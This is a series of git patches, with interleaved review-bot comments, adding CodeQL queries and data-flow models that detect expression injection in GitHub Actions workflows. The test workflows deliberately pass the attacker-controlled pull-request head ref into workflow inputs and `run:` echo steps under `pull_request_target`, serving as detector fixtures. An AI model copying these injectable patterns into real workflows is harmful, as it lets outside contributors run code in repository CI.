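Review bot: The private class `ExpressionInjectionSink` in the new `CompositeActionsSinks.ql` is repeated verbatim in `ReusableWorkflowsSinks.ql` later in this commit, so the two model-generator queries can drift apart from each other and from whatever the main expression-injection query treats as a sink. Defining it once in a library module under `codeql.actions` and importing it in both queries keeps the sink definition in one place. The `source ... getFile() = sink ... getFile()` restriction is applied only in the `where` clause here and in the Summaries and Sources hunks; a short comment saying why cross-file paths are discarded would help, e.g. `// models are per file: ignore paths that leave the action's own file`.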
diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 67adac7dd32..b3eb6d348a8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -40,5 +40,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql new file mode 100644 index 00000000000..9317b900158 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
@@ -0,0 +1,42 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql new file mode 100644 index 00000000000..eeea688b273 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql 
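Review bot: The query id is misspelled: `@id actions/reusable-wokflow-sinks` should be `@id actions/reusable-workflow-sinks`, in line with the sibling ids `actions/reusable-workflow-sources` and `actions/reusable-workflow-summaries` added in the same commit. Query ids show up in results and can be referenced from suite filters, so correcting the spelling later means a rename for anyone who has consumed it.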
@@ -0,0 +1,46 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql new file mode 100644 index 00000000000..3949488e129 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql 
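Review bot: Inside `MyConfig`, the first disjunct of `allowImplicitRead` is `allowImplicitRead(node, set)` with the same arguments, which as far as this hunk shows refers to the predicate being defined. A self-reference like that adds no tuples, so only `isSink(node) and set instanceof DataFlow::FieldContent` has any effect. Drop the recursive line, or if a default from the signature was intended, call it by its qualified name and say so in a comment. The `@description` also needs a plural: `Reusable workflows that pass user-controlled data to their output variables.`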
@@ -0,0 +1,37 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" From 010d7df71d36ec98e41f03827fcc14fc949ad1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 11:58:54 +0100 Subject: [PATCH 0060/1267] feat(reusable-workflow-models): Reusable workflow MaD Add support to define sources/sinks/summaries for Reusable Workflows as MaD entries. --- .../actions/controlflow/internal/Cfg.qll | 16 ++------------- .../dataflow/internal/DataFlowPrivate.qll | 20 ++++++++++++++++++- .../dataflow/internal/DataFlowPublic.qll | 11 ++++++++++ ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ++++++++++++++++ ql/lib/test/test.ql | 13 ++++++------ .../.github/workflows/calling_workflow.yml | 16 +++++++++++---- 6 files changed, 67 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml 
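Review bot: The `@description` of `ReusableWorkflowsSummaries.ql` is copied from the Sources query and speaks of "user-controlled data", but `isSource` here selects the workflow's own inputs via `getInputsStmt().getInputExpr(_)`. A description that matches the configuration would be `@description Reusable workflows that pass their input parameters to their output variables.` The header is what users see in the query listing, so the two queries should not read the same.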
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8808fb0afe5..94a2c6a71e2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -243,21 +243,9 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} +private class UsesExprTree extends LeafTree instanceof UsesExpr { } -private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189..e1a3479cfc0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -58,7 +58,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } 
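Review bot: After the `Cfg.qll` change, `UsesExpr` is covered by two tree classes at once: `UsesExprTree extends LeafTree` and `UsesTree extends StandardPreOrderTree`, the latter with argument and env children. A node that is both a leaf and a pre-order parent would be expected to get two sets of exit edges, one directly from the node and one from its last child; this should be checked against the CFG consistency queries. If the intent was only to merge `StepUsesTree` and `JobUsesTree`, the line `private class UsesExprTree extends LeafTree instanceof UsesExpr { }` can go. The body of `UsesTree` continues outside the hunk.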
@@ -180,6 +180,23 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -215,6 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8b62cccf30a..5fe3c741735 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -66,6 +66,17 @@ class ParameterNode extends ExprNode { InputExpr getInputExpr() { result = input } } +/** + * A call to a data flow callable (Uses). + */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } +} + /** * An argument to a Uses step (call). */ diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml new file mode 100644 index 00000000000..7adbcd5adbd --- /dev/null +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 4b2be43bbda..168987284c3 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql 
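Review bot: `CallNode` declares `private DataFlowCall call;`, but neither the characteristic predicate nor `getCallee()` ever mentions it. A field that is not constrained in the characteristic predicate is at best dead, and depending on how the compiler treats it, it can pair each node with every `DataFlowCall` value. Either remove the field, or bind it in the characteristic predicate and have `getCallee()` return `call.getName()`, so that the cast `this.getCfgNode().(DataFlowCall)` is not repeated.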
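Review bot: This file holds test-only models for placeholder repositories (`octo-org/summary-repo`, `octo-org/source-repo`, `octo-org/sink-repo`), yet it is created under `ql/lib/ext/`, next to the models that describe real actions. If the library pack loads every `*.model.yml` in that directory (the pack manifest is not part of this hunk), these rows ship to users. A workflow that happens to call a repository with one of these names would then gain a source, sink or summary that nobody reviewed. Moving the file under the test tree, or into a test-only extension pack, keeps fixtures out of the shipped model set.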
@@ -43,14 +43,9 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - //any() - n.getAstNode() instanceof OutputsStmt -} +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::ExprNode e) { any() } @@ -69,3 +64,7 @@ query predicate sources(string action, string version, string output, string tri query predicate summaries(string action, string version, string input, string output, string kind) { summaryModel(action, version, input, output, kind) } + +query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } + +query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml index 9aafe1189ef..7c2bfdf0348 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/src/test/.github/workflows/calling_workflow.yml 
@@ -8,17 +8,20 @@ jobs: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call3: - uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call4: + uses: octo-org/source-repo/.github/workflows/workflow.yml@v1 + call5: + uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit job1: runs-on: ubuntu-latest @@ -36,3 +39,8 @@ jobs: needs: call3 steps: - run: echo ${{ needs.call3.outputs.workflow-output }} + job4: + runs-on: ubuntu-latest + needs: call4 + steps: + - run: echo ${{ needs.call4.outputs.workflow-output }} From a2210dca79e5bbd4bda0b1bbe3d965c58facfdc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 0061/1267] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263..5037a55d632 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } 
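Review bot: `getEnclosingWorkflowStmt()` never mentions `this`: the body `exists(WorkflowStmt w | w.getAChildNode*() = result)` holds for any `result` that is a workflow, because the `*` closure is reflexive. Every statement therefore reports every workflow in the database as its enclosing workflow, so the trigger check in the new `CriticalExpressionInjection.ql` passes as soon as any analysed workflow uses `pull_request_target`. The body should be `exists(WorkflowStmt w | w.getAChildNode*() = this and result = w)`; PATCH 0062 further down makes that change, so squashing it in would avoid a commit that ships the broken predicate. The QLDoc was moved from `JobStmt` and still says "this job"; `/** Gets the workflow that contains this statement. */` fits better. The same hunk is repeated in PATCH 0063.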
@@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 00000000000..624bd32e45c --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc90..c34fcb74bbc 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions 
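Review bot: Lowering `@security-severity` from 9.3 to 5.0 in `ExpressionInjection.ql` downgrades every flow the new critical query does not pick up, and at this commit the critical query only accepts workflows with `hasTriggerEvent("pull_request_target")`. Workflows triggered by `issue_comment`, `issues` or `workflow_run` also run in the base repository's context, so injection flows there would now be triaged as medium. The hunk shows only metadata, so the general query presumably still reports the `pull_request_target` flows as well, giving the same path under two query ids. Consider keeping 9.3 until the critical query covers the full trigger list, or excluding from the general query the flows that the critical one already matches. The same hunks recur in PATCH 0063.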
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac0..8271f93d857 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From 3814462266e9482cc9686f60257006f45f8165bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 0062/1267] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d632..2e93187b6bf 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** 
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb5572..594b6017729 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580..0e82498bfc1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } 
@@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** 
@@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189..ae99e7c9184 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -201,7 +201,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) 
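Review bot: The two `DataFlowPrivate.qll` hunks update `stepsCtxLocalStep` and `envCtxLocalStep` to the new four-argument `externallyDefinedSource`, but `needsCtxLocalStep`, added by PATCH 0060 on this page, still calls it with three arguments. Both patches start from blob `89f31983189`, so this one seems to have been written without 0060 applied; once both land, the file would not compile. When rebasing, change that call to `externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _)`. Both predicates touched here begin and end outside their hunks.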
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26d..34cb56a01ad 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826..6fefec9a4f8 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5..d7cbde25b88 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml 
